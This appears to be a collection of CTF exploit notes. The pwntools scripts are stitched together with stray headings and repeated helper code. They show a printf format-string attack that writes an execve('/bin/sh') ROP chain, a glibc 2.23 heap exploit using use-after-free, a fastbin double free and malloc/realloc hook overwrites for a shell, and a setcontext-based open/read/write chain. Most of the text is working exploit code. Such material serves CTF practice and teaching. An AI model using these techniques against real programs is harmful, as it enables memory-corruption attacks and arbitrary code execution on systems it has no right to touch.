ANY

from pwn import * 
from pwncli import *
from LibcSearcher import*
io = process("./ttt")
context.terminal = ["tmux", "splitw", "-h"]
context.log_level = 'debug'   # trace every byte on the tube; noisy, but invaluable while tuning offsets
context.arch = 'amd64'
ARROW = ' ============================================> '


# Thin wrappers over the tube so the exploit body stays short.  Each one
# returns whatever the underlying pwntools call returns.
def s(data):
    """Send *data* as-is."""
    return io.send(data)


def sa(delim, data):
    """Send *data* once *delim* has been received."""
    return io.sendafter(delim, data)


def sl(data):
    """Send *data* followed by a newline."""
    return io.sendline(data)


def sla(delim, data):
    """Send *data* plus newline once *delim* has been received."""
    return io.sendlineafter(delim, data)


def rv(num):
    """Receive up to *num* bytes."""
    return io.recv(num)


def rec():
    """Receive whatever is currently available."""
    return io.recv()


def rl():
    """Receive one line."""
    return io.recvline()


def ru(delims):
    """Receive up to and including *delims*."""
    return io.recvuntil(delims)


def info(tag, addr):
    """Log *addr* as hex under *tag* through pwntools' logger."""
    return log.info(tag + " -> " + hex(addr))


def ia():
    """Hand the tube over to the user."""
    return io.interactive()


def li(tag, x):
    """Print *tag* and the string *x* in orange, separated by ARROW."""
    return print("\x1b[1;38;5;214m" + tag + ARROW + "\x1b[0m" + '\x1b[01;38;5;214m' + x + '\x1b[0m')


def ll(x):
    """Print the string *x* in red."""
    return print('\x1b[01;38;5;1m' + x + '\x1b[0m')

fmtstr

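def _split_leaks(raw):
    """Split an echoed leak line such as b'0x..>0x..>0x..!' into its b'0x..' parts.

    The trailing b'!' terminator (the byte recvuntil stops on) is dropped
    first so that every element, including the last one, goes straight
    into int(part, 16).
    """
    if raw.endswith(b"!"):
        raw = raw[:-1]
    return raw.split(b">")


def getadd(fmt):
    """Send the format string *fmt* as the name and return the leaked pointers.

    The target echoes the formatted name back; everything up to the
    closing b'!' is read and split on b'>' (the separator the caller puts
    between its %p conversions).

    Fix: recvuntil() includes the delimiter, so the original returned the
    last element with a trailing b'!' attached, which makes int(x, 16)
    raise.  The b'!' is now stripped, matching the ./vuln version of this
    helper further down the page.
    """
    sa(b'First, please tell me your name.\n', fmt)
    byte_stream = io.recvuntil(b"!")
    return _split_leaks(byte_stream)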
from pwn import * 
from pwncli import *
from LibcSearcher import*
io = process("./vuln")
elf = ELF("./libc.so.6")      # NOTE: despite the name this is the libc image; only its symbol offsets are used
#io = remote("node5.buuoj.cn",25651)
context.terminal = ["tmux", "splitw", "-h"]
context.log_level = 'debug'   # trace every byte on the tube; noisy, but invaluable while tuning offsets
context.arch = 'amd64'
ARROW = ' ============================================> '


# Thin wrappers over the tube so the exploit body stays short.  Each one
# returns whatever the underlying pwntools call returns.
def s(data):
    """Send *data* as-is."""
    return io.send(data)


def sa(delim, data):
    """Send *data* once *delim* has been received."""
    return io.sendafter(delim, data)


def sl(data):
    """Send *data* followed by a newline."""
    return io.sendline(data)


def sla(delim, data):
    """Send *data* plus newline once *delim* has been received."""
    return io.sendlineafter(delim, data)


def rv(num):
    """Receive up to *num* bytes."""
    return io.recv(num)


def rec():
    """Receive whatever is currently available."""
    return io.recv()


def rl():
    """Receive one line."""
    return io.recvline()


def ru(delims):
    """Receive up to and including *delims*."""
    return io.recvuntil(delims)


def info(tag, addr):
    """Log *addr* as hex under *tag* through pwntools' logger."""
    return log.info(tag + " -> " + hex(addr))


def ia():
    """Hand the tube over to the user."""
    return io.interactive()


def li(tag, x):
    """Print *tag* and the string *x* in orange, separated by ARROW."""
    return print("\x1b[1;38;5;214m" + tag + ARROW + "\x1b[0m" + '\x1b[01;38;5;214m' + x + '\x1b[0m')


def ll(x):
    """Print the string *x* in red."""
    return print('\x1b[01;38;5;1m' + x + '\x1b[0m')


def getadd(fmt):
    """Send the format string *fmt* at the food prompt and return the leaked words.

    The target echoes the input after "You like "; the echo is read up to
    the b'!' the caller terminates the format string with, the b'!' is
    dropped, and the remainder is split on b'>' (the separator the caller
    places between its %p conversions).  Each element is a b'0x..' string.
    """
    sla("what's your favourite food: ", fmt)
    ru(b'You like ')
    echoed = io.recvuntil(b"!")
    leak_line = echoed[:-1]   # drop the b'!' terminator itself
    return leak_line.split(b">")
def pr(add1, add2, canary, stackadd):
    """Print the recovered libc base, program base, canary and stack address via li()."""
    labelled = (
        ("libcbase", add1),
        ("probase", add2),
        ("canary", canary),
        ("stack", stackadd),
    )
    for tag, value in labelled:
        li(tag, hex(value))
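def _fmt_write(num, position, by):
    """Build the printf conversion that stores *num* through the pointer at argument *position*.

    by == 1 -> ``%hhn`` (low byte), by == 2 -> ``%hn`` (low 16 bits).  A
    ``%{num}c`` padding conversion precedes it so that exactly *num*
    characters have been printed when the store happens; it is omitted
    for num == 0.  Callers are expected to mask *num* to the write width
    (the exploit body does ``& 0xff`` / ``& 0xffff``).

    Raises ValueError for any other *by*: the original left ``fmt``
    unbound in that case and died with an UnboundLocalError at the send.
    """
    if by == 1:
        width = "hhn"
    elif by == 2:
        width = "hn"
    else:
        raise ValueError(f"unsupported write width {by!r}: use 1 (%hhn) or 2 (%hn)")
    padding = f"%{num}c" if num != 0 else ""
    return f"{padding}%{position}${width}"


def change(front, num, position, by):
    """Wait for the prompt *front*, then send one format-string write.

    See _fmt_write for the conversion produced; the bytes are sent with a
    trailing newline via sla().
    """
    sla(front, _fmt_write(num, position, by).encode())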

# ---------------------------------------------------------------------------
# Exploit body for ./vuln.  The target feeds user input to printf repeatedly,
# which gives (1) pointer leaks via %p and (2) arbitrary writes via
# %hn / %hhn.  The writes build an execve("/bin/sh", 0, 0) ROP chain on the
# stack and raise the target's remaining-rounds counter so enough printf
# rounds are left to finish the chain.
# Every fixed offset below was taken from one debugging session against one
# specific binary/libc pair and is stale for anything else.
# ---------------------------------------------------------------------------
sa(b'Give me your name:',32*b'a')   # the name is filler; the food prompt is the one that matters
ru(b'Hello ')
# Leak printf arguments 8, 9 and 11: per the corrections applied below a
# program address, a libc address and a stack address.  Which word sits at
# which index was worked out in a debugger; it is not derivable from here.
adds = getadd(b'%8$p>%9$p>%11$p!')
# Each "+ A - B" pair is (base, leaked value) as seen in one gdb session;
# only the difference matters, the absolute values are meaningless now.
probase = int(adds[0],16) + 0x5600b5200000 - 0x5600b5200b60
libcbase = int(adds[1],16) + 0x7ff87b3d0000 - 0x7ff87b3f0840
rbp = int(adds[2],16) + 0x7fffd13d3d80 - 0x7fffd13d3e68
# Stack word that limits how many input rounds the target allows (rbp-0xc);
# inferred from how it is used below -- confirm against the binary.
countadd = rbp - 0xc
pr(libcbase,probase,0x0,rbp)   # the canary is neither leaked nor needed: every write is address-targeted
## raise the round counter
sleep(0.5)
# Two-level write: argument 11 appears to hold a pointer to the stack word
# that printf reads as argument 37.  %11$hn points that word (low 16 bits)
# at countadd, then %37$hn writes the new count through it.
change(b"what's your favourite food: ",(countadd&0xffff),11,2)
change(b"what's your favourite food: ",(0x100-136),37,2)   # 0x100-136 == 120 rounds
sleep(0.5)
## return address / gadgets
# Gadget and "/bin/sh" offsets in the bundled libc (the ELF loaded as `elf`).
# Named by the author as pop-rdi / pop-rsi / pop-rdx style gadgets; they
# must be regenerated (ROPgadget, strings) for any other libc build.
rdi = libcbase+ 0x0000000000021112
rsi = libcbase + 0x00000000000202f8
rdx = libcbase + 0x0000000000001b92
binsh = libcbase + 0x000000000018ce57
exc = libcbase + elf.sym["execve"]
## arguments 25 -> 39 are used the same way: 25 points at the stack word read as 39

ret1 = rbp + 8          # saved return address of the vulnerable frame
ret1value = ret1+8      # qword the rdi gadget pops: "/bin/sh"

#gdb.attach(io)
# Each qword is written in 16-bit halves: first point argument 39 at the
# target address (via %25$hn), then write the half through it (via %39$hn).
for i in range(4):
    change(b"what's your favourite food: ",((ret1+2*i)&0xffff),25,2) ## set destination address
    change(b"what's your favourite food: ",((rdi>>(16*i))&0xffff),39,2) ## write the value at the destination
for i in range(4):
    change(b"what's your favourite food: ",((ret1value+2*i)&0xffff),25,2) ## set destination address
    change(b"what's your favourite food: ",((binsh>>(16*i))&0xffff),39,2) ## write the value at the destination
#pause()
## set rsi (argv = 0)
ret2 = ret1value + 8
ret2value = ret2 + 8
'''
for i in range(4):
change(b"what's your favourite food: ",((ret2+2*i)&0xffff),25,2)
change(b"what's your favourite food: ",((rsi>>(16*i))&0xffff),39,2)
for i in range(4):
change(b"what's your favourite food: ",((ret2value+2*i)&0xffff),25,2)
change(b"what's your favourite food: ",((0x0>>(16*i))&0xffff),39,2)
'''
# From here on the qwords are written byte-wise (%hhn); the 16-bit variant
# is kept above as a string literal for reference.  Byte writes never print
# more than 255 padding characters per round, but they only update the LOW
# BYTE of argument 39: this relies on ret2..ret4 sharing all higher bytes
# with the last 16-bit target (ret1value+6).  If the frame straddles a
# 0x100 boundary the byte writes land on the wrong address.
for i in range(8):
    change(b"what's your favourite food: ",((ret2+i)&0xff),25,1)
    change(b"what's your favourite food: ",((rsi>>(8*i))&0xff),39,1)
for i in range(8):
    change(b"what's your favourite food: ",((ret2value+i)&0xff),25,1)
    change(b"what's your favourite food: ",((0x0>>(8*i))&0xff),39,1)
## set rdx (envp = 0)
ret3 = ret2value + 8
ret3value = ret3 + 8
'''
for i in range(4):
change(b"what's your favourite food: ",((ret3+2*i)&0xffff),25,2)
change(b"what's your favourite food: ",((rdx>>(16*i))&0xffff),39,2)
for i in range(4):
change(b"what's your favourite food: ",((ret3value+2*i)&0xffff),25,2)
change(b"what's your favourite food: ",((0x0>>(16*i))&0xffff),39,2)
'''
for i in range(8):
    change(b"what's your favourite food: ",((ret3+i)&0xff),25,1)
    change(b"what's your favourite food: ",((rdx>>(8*i))&0xff),39,1)
for i in range(8):
    change(b"what's your favourite food: ",((ret3value+i)&0xff),25,1)
    change(b"what's your favourite food: ",((0x0>>(8*i))&0xff),39,1)
## set the final return target: execve
ret4 = ret3value + 8
'''
for i in range(4):
change(b"what's your favourite food: ",((ret4+2*i)&0xffff),25,2)
change(b"what's your favourite food: ",((exc>>(16*i))&0xffff),39,2)
'''
for i in range(8):
    change(b"what's your favourite food: ",((ret4+i)&0xff),25,1)
    change(b"what's your favourite food: ",((exc>>(8*i))&0xff),39,1)




# Burn the rounds that are left (the counter was set to 120 above) with
# harmless input so the target's loop ends and its return lands in the
# chain.  23 is tuned to the number of change() calls made above; adjust it
# together with them.
for i in range(23):
    sla(b"what's your favourite food: ",b'a')
io.interactive()



pr

def pr(add1, add2, canary, stackadd):
    """Print the recovered libc base, program base, canary and stack address via li()."""
    tags = ("libcbase", "probase", "canary", "stack")
    values = (add1, add2, canary, stackadd)
    for tag, value in zip(tags, values):
        li(tag, hex(value))

realloc_hook + malloc_hook

from pwn import * 
from pwncli import *
from LibcSearcher import*
io = process("./xueba")
elf = ELF("./libc-2.23.so")   # NOTE: despite the name this is the libc image; only its symbol offsets are used
context.terminal = ["tmux", "splitw", "-h"]
context.log_level = 'debug'   # trace every byte on the tube; noisy, but invaluable while tuning offsets
context.arch = 'amd64'
ARROW = ' ============================================> '


# Thin wrappers over the tube so the exploit body stays short.  Each one
# returns whatever the underlying pwntools call returns.
def s(data):
    """Send *data* as-is."""
    return io.send(data)


def sa(delim, data):
    """Send *data* once *delim* has been received."""
    return io.sendafter(delim, data)


def sl(data):
    """Send *data* followed by a newline."""
    return io.sendline(data)


def sla(delim, data):
    """Send *data* plus newline once *delim* has been received."""
    return io.sendlineafter(delim, data)


def rv(num):
    """Receive up to *num* bytes."""
    return io.recv(num)


def rec():
    """Receive whatever is currently available."""
    return io.recv()


def rl():
    """Receive one line."""
    return io.recvline()


def ru(delims):
    """Receive up to and including *delims*."""
    return io.recvuntil(delims)


def info(tag, addr):
    """Log *addr* as hex under *tag* through pwntools' logger."""
    return log.info(tag + " -> " + hex(addr))


def ia():
    """Hand the tube over to the user."""
    return io.interactive()


def li(tag, x):
    """Print *tag* and the string *x* in orange, separated by ARROW."""
    return print("\x1b[1;38;5;214m" + tag + ARROW + "\x1b[0m" + '\x1b[01;38;5;214m' + x + '\x1b[0m')


def ll(x):
    """Print the string *x* in red."""
    return print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def cmd(index):
    """Pick menu entry *index* once the menu (which ends in "5.Exit") has been printed."""
    choice = str(index).encode()
    sla("5.Exit\n", choice)
def cre(size, note, chunkcon):
    """Menu 1: create a note of *size* bytes with header *note* and body *chunkcon*.

    *note* is sent after the name/content prompt and *chunkcon* half a
    second later.  The target prints no prompt between the two fields, so
    the pause presumably keeps them from being swallowed by a single read;
    tune it if the target is slow.
    """
    cmd(1)
    length = str(size).encode()
    sla(b'How long is your note?\n', length)
    sa(b'Input your note name and note content:', note)
    sleep(0.5)
    s(chunkcon)
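def show(index):
    """Menu 2: display note *index* and return ``(name, content)`` as stripped bytes.

    The target prints ``Name <name>\\n`` followed by ``Content:<content>\\n``;
    each field is read up to its newline.  Every delimiter is a bytes
    literal here: the original mixed ``"\\n"`` (str) with the ``b'...'``
    delimiters used everywhere else, which only works because pwntools
    encodes str delimiters via ``context.encoding``.
    """
    cmd(2)
    sla(b'Index:\n', str(index).encode())
    ru(b'Name ')
    name = ru(b"\n").strip()
    ru(b'Content:')
    con = ru(b"\n").strip()
    return name, con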

def de(index):
    """Menu 3: delete (free) note *index*."""
    cmd(3)
    idx = str(index).encode()
    sla(b'Index:\n', idx)
def change(index, letter, last):
    """Menu 4: edit note *index*.

    *letter* answers the "Which letter do you want to change?" prompt and
    *last* is sent right behind it without waiting for a second prompt.
    """
    cmd(4)
    idx = str(index).encode()
    sla(b'Index:\n', idx)
    sa(b'Which letter do you want to change?\n', letter)
    s(last)
def ex():
    """Menu 5: exit the note manager."""
    sla("5.Exit\n", b'5')

# ---------------------------------------------------------------------------
# Exploit body for ./xueba (glibc 2.23 note manager).
# Every note is created with a 16-byte name followed by p32(1) and a NUL.
# The dword at offset 16 looks like an "in use" flag that de() clears and
# that change(idx, b'\x00', b'\x01') flips back on (it swaps the first NUL
# in the note -- i.e. that flag -- for 0x01).  That is what turns free()
# into a use-after-free below; confirm against the binary.
# All libc offsets are for the one libc-2.23 build shipped with the task.
# ---------------------------------------------------------------------------
cre(600,16*b'a'+p32(0x1)+b'\x00',8*b'b') #index = 0   -- too big for the fastbins
cre(0x67,16*b'a'+p32(0x1)+b'\x00',8*b'b') #index = 1   -- keeps note 0 away from top
de(0)   # note 0 lands in the unsorted bin: its fd/bk now point into main_arena

change(0,b'\x00',b'\x01')   # re-mark the freed note as live so show() prints it (UAF)
name,con = show(0)
# con starts with the stale fd (main_arena+88 presumably); the "+A-B" pair is
# (libc base, leaked fd) from a gdb session, i.e. libcbase = fd - 0x3c4b78.
libcbase = u64(con.ljust(8,b'\x00')) + 0x7f023dc0f000 - 0x7f023dfd3b78
li("libcbase",hex(libcbase))


# Fastbin double free on the 0x70-byte chunks: free 1, free 2, re-mark 1 as
# live, free 1 again.  glibc 2.23 only compares against the bin head
# (chunk 2), so the 1 -> 2 -> 1 list is accepted.
cre(0x67,16*b'a'+p32(0x1)+b'\x00',8*b'b') #index = 2
cre(0x88,16*b'a'+p32(0x1)+b'\x00',8*b'b') #index = 3(pro)
de(1)
de(2)
change(1,b'\x00',b'\x01')
de(1)
de(3)
__libc_reallocadd = libcbase + elf.symbols["__libc_realloc"]
# one_gadget candidates for this libc (execve("/bin/sh") under different
# register constraints); only one[0] is used below.
one = [libcbase + 0x4526a,libcbase +0xf02a4 ,libcbase +0xf1147]
# Re-allocating chunk 1 lets us set its fd: libc+0x3c4aed, the usual fake
# 0x7f-sized chunk sitting 0x23 bytes before __malloc_hook (the "+A-B" pair
# is again (fake chunk addr, libc base) from gdb, minus the 8-byte header).
cre(0x67,16*b'a'+p32(0x1)+b'\x00',p64(libcbase + 0x7f57acdb3af5-0x8-0x7f57ac9ef000))#index = 1 change
cre(0x67,16*b'a'+p32(0x1)+b'\x00',8*b'b')#index = 2
cre(0x67,16*b'a'+p32(0x1)+b'\x00',8*b'b')#index = 3

# The fourth allocation returns the fake chunk.  0xb bytes of padding reach
# __realloc_hook, which gets the one_gadget; the next qword is
# __malloc_hook, which gets __libc_realloc+12 -- a common way to let
# realloc's prologue adjust the stack so the one_gadget constraints hold.
cre(0x67,16*b'a'+p32(0x1)+b'\x00',(0xb08-0xaf5-0x8)*b'b'+p64(one[0])+p64(__libc_reallocadd+12))#index = 4
de(1)
# Any malloc now goes __malloc_hook -> realloc -> __realloc_hook -> shell.
cmd(1)
sla(b'How long is your note?\n',b'24')
io.interactive()

file_LIST_ALL

https://cord-nape-83b.notion.site/apple2-ecb92e976ae74ff3a1f5788d4623ced7

orw+setcontext

'''
ROPgadget --binary libc.so.6 --only "mov|call"
'''
'''
0x0000000000167420 : mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
'''

# ---------------------------------------------------------------------------
# Final stage of an open/read/write (orw) chain that pivots through
# setcontext.  add()/delete(), the tube `s`, and every *_addr / gadget
# name are defined earlier in the full script (not shown on this page).
# Chain: __free_hook -> magic gadget (mov rdx,[rdi+8]; ...; call [rdx+0x20])
#   free(chunk 28): rdi = chunk 28, so rdx = stack_addr and the call goes
#   to [stack_addr+0x20] = setcontext+61, which loads registers from the
#   fake ucontext at stack_addr and returns into the orw ROP chain.
# The ucontext offsets used (rsp at +0xa0, rcx at +0xa8) are those of the
# glibc versions whose setcontext takes the context pointer in rdx; check
# the target libc before reusing this.
# ---------------------------------------------------------------------------
add(0x40 ,b'a'*0x20 + p64(0) + p64(0x31) + p64(__free_hook)) #18   fake 0x30 header + fd -> __free_hook (presumably an overflow into the next chunk)
add(0x20 ,b'a') # 20
add(0x20 ,p64(magic_gadget)) # 27   this allocation lands on __free_hook

add(0x10 , p64(0) + p64(stack_addr)) # 28   chunk+8 = stack_addr: becomes rdx when this chunk is freed
success(hex(stack_addr))

# Fake ucontext at stack_addr: "./flag" at +0 (doubles as the open() path),
# setcontext+61 at +0x20 (the gadget's call target), zeros up to +0xa0
# (every register setcontext restores from that span, rsi included, is 0),
# then rsp = orw_addr at +0xa0 and rcx = ret_addr at +0xa8.
stack = b'./flag\x00\x00' + p64(0)*3 + p64(setcontext_61)
stack+= b'\x00'*(0xa0-0x28)
stack+= p64(orw_addr) + p64(ret_addr)

add(0xb0 ,stack) # 29

# ROP chain expected at orw_addr.  open() relies on rsi (flags) already
# being 0 == O_RDONLY from the ucontext above -- nothing in the chain sets
# it.  The read/write steps hard-code fd 3, i.e. assume 0/1/2 are the only
# descriptors open in the target.
orw = p64(pop_rdi_ret) + p64(stack_addr)
orw+= p64(pop_rax_ret) + p64(2)                 # SYS_open
orw+= p64(syscall_ret)
orw+= p64(pop_rdi_ret) + p64(3)
orw+= p64(pop_rsi_ret) + p64(bss_addr)
orw+= p64(pop_rdx_r12_ret) + p64(0x100) + p64(0)
orw+= p64(pop_rax_ret) + p64(0)                 # SYS_read
orw+= p64(syscall_ret)
orw+= p64(pop_rdi_ret) + p64(1)
orw+= p64(pop_rsi_ret) + p64(bss_addr)
orw+= p64(pop_rdx_r12_ret) + p64(0x100) + p64(0)
orw+= p64(pop_rax_ret) + p64(1)                 # SYS_write
orw+= p64(syscall_ret)

add(0x100 ,orw) # 30   must land at orw_addr (presumably predicted from the earlier allocations)
#gdb.attach(s)
delete(28)      # free(chunk 28) fires __free_hook and starts the chain
s.interactive()